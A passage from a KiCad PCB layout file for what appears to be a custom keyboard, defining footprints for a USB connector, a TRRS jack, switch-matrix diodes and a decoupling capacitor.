(pad 5 smd rect (at -5.7 -0.8 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 4 smd rect (at -5.7 -1.6 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 71 /D+))
(pad 3 smd rect (at -5.7 -2.4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 70 /D-))
(pad 2 smd rect (at -5.7 -3.2 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 1 smd rect (at -5.7 -4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(model ${KISYS3DMOD}/Package_QFP.3dshapes/TQFP-44_10x10mm_P0.8mm.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module kbd:TRRS-PJ-320A (layer F.Cu) (tedit 5ECEB228) (tstamp 5ECCBEB0)
(at 130 80.7 90)
(path /5EFEDC58)
(fp_text reference Jack1 (at 0 14.2 90) (layer Dwgs.User) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value TRRS (at 0 -5.6 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 3.05 0) (end -3.05 0) (layer F.SilkS) (width 0.15))
(fp_line (start 3.05 12.1) (end -3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start 3.05 0) (end 3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start -3.05 0) (end -3.05 12.1) (layer F.SilkS) (width 0.15))
(fp_line (start 2.8 0) (end 2.8 -2) (layer F.SilkS) (width 0.15))
(fp_line (start -2.8 0) (end -2.8 -2) (layer F.SilkS) (width 0.15))
(fp_line (start 2.8 -2) (end -2.8 -2) (layer F.SilkS) (width 0.15))
(fp_text user Sleeve (at 0.25 11.4 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Tip (at 0 10 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Ring1 (at 0 6.25 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(fp_text user Ring2 (at 0 3.25 90) (layer F.Fab) hide
(effects (font (size 0.7 0.7) (thickness 0.1)))
)
(pad R1 thru_hole oval (at 2.3 6.2 90) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 12 "Net-(Jack1-PadR1)"))
(pad "" np_thru_hole circle (at 0 1.6 90) (size 0.8 0.8) (drill 0.8) (layers *.Cu *.Mask))
(pad "" np_thru_hole circle (at 0 8.6 90) (size 0.8 0.8) (drill 0.8) (layers *.Cu *.Mask))
(pad R2 thru_hole oval (at 2.3 3.2 90) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 33 VDD))
(pad T thru_hole oval (at 2.3 10.2 90) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 13 "Net-(Jack1-PadT)"))
(pad S thru_hole oval (at -2.3 11.3 90) (size 1.6 2) (drill oval 0.9 1.3) (layers *.Cu *.Mask)
(net 34 VSS))
(model /Users/danny/syncproj/kicad-libs/footprints/Keebio-Parts.pretty/3dmodels/PJ-320A.step
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz -90 0 180))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBCEC)
(at 172 42.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3ADF8)
(attr smd)
(fp_text reference D1_6 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 50 "Net-(D1_6-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 27 /row1,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBC8A)
(at 191 18.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AE19)
(attr smd)
(fp_text reference D0_7 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 41 "Net-(D0_7-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBDDA)
(at 153 64.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AE53)
(attr smd)
(fp_text reference D2_5 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 59 "Net-(D2_5-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 32 /row1,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBCB4)
(at 153 26.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3ADC4)
(attr smd)
(fp_text reference D0_5 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 39 "Net-(D0_5-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBE12)
(at 139.6 90.9 210)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AF4E)
(attr smd)
(fp_text reference D3_5 (at 0 -2 30) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1 30) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2 30) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 210) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 66 "Net-(D3_5-Pad2)"))
(pad 1 smd rect (at -1.65 0 210) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 31 /row1,3))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBD5C)
(at 229 55.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AEEC)
(attr smd)
(fp_text reference D1_9 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 53 "Net-(D1_9-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 27 /row1,1))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDC4151)
(at 140.4 76.45 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ED8F3F5)
(attr smd)
(fp_text reference C9 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_text user %V (at 0 0 180) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 33 VDD))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 34 VSS))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBC98)
(at 172 23.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3ADEC)
(attr smd)
(fp_text reference D0_6 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 40 "Net-(D0_6-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 26 /row1,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBE2E)
(at 161.75 83.45 195)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AF58)
(attr smd)
(fp_text reference D3_6 (at 0 -2 15) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1 15) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2 15) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 195) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 67 "Net-(D3_6-Pad2)"))
(pad 1 smd rect (at -1.65 0 195) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 31 /row1,3))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBDBE)
(at 210 62.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AEC4)
(attr smd)
(fp_text reference D2_8 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 62 "Net-(D2_8-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 32 /row1,2))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5ECCBC6E)
(at 210 24.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5FD3AEB0)
(attr smd)
(fp_text reference D0_8 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
